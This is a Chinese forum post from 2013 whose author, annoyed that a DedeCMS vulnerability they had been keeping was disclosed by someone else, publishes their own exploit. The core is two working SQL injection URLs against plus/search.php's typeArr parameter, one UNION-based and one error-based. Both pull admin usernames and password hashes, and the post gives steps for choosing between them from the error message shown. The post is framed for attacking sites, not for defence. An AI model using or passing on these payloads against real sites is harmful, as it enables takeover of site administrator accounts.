转载不加作者名的没JJ
8 c- l1 o& a. w3 D' _
$ v/ s7 `$ A5 g& S$ t% c# x1 Z4 Z哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。$ ^8 g. k6 \% p" B# W4 w2 p3 g$ x) n
4 h4 g/ D0 \; y% Z5 {5 \* ^
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。 Q/ K& \& L* M4 m) _ t6 V- o
& B( h- {+ v- l! V5 ~0 L3 m我一般是这样测试的:
3 z6 i6 U" N2 x: T3 [& d& O$ ]
1 \& {, d* i* b, {提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a) x( H1 Z5 W# p- H
9 h t3 I" M# k, x转载不加作者名的没JJ
6 T& f3 S+ X4 \; {, n% L
# S: ]/ }1 L) v作者:鬼哥2 g5 _0 V# a3 F% M9 u1 `
: n1 {$ w. E; p7 P/ Q; x1 y
" i" ~# A& F$ Q5 m8 _' ]& ?
O9 k7 R/ _' w& @9 Z, \4 B看结果如果提示2 G. l. U7 z6 A8 d: x5 [
/ A# q7 y {6 M. _; y
Safe Alert: Request Error step 2 !: t! o1 o+ P/ K* v/ t8 l9 q
# ^9 m7 \; \# h0 _$ `- Z
那么直接用下面的exp
/ N& a0 R0 ^; f, S* ?) [6 r( w: I/ H8 K
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a) d- g* Q! x" L1 V
7 o6 Z1 B" e% k( E6 X+ Z4 N
$ \# s0 W# W7 R
看结果如果提示
/ f% F8 M" ~, e) H- k" W+ B8 Q/ l, g7 p$ Y7 y( V
Safe Alert: Request Error step 1 !# _7 C9 a4 I" v" U( W
, k8 j2 H5 o) ~) ]% s8 S+ q; o+ c$ T9 P
那么直接用下面的exp
( Q$ n- s$ S! T' F# d2 X1 y2 M8 n# ^. i- ~( y) H8 S
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a- Y% v2 q* k' n$ S v& |8 c' G
1 A( _, t, h! V( q
) W5 C" y! Z$ U3 c) D
如果正常显示证明漏洞不存在了。
5 f4 {- x9 E, S9 q8 r
" L' f0 L4 M6 F0 B转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对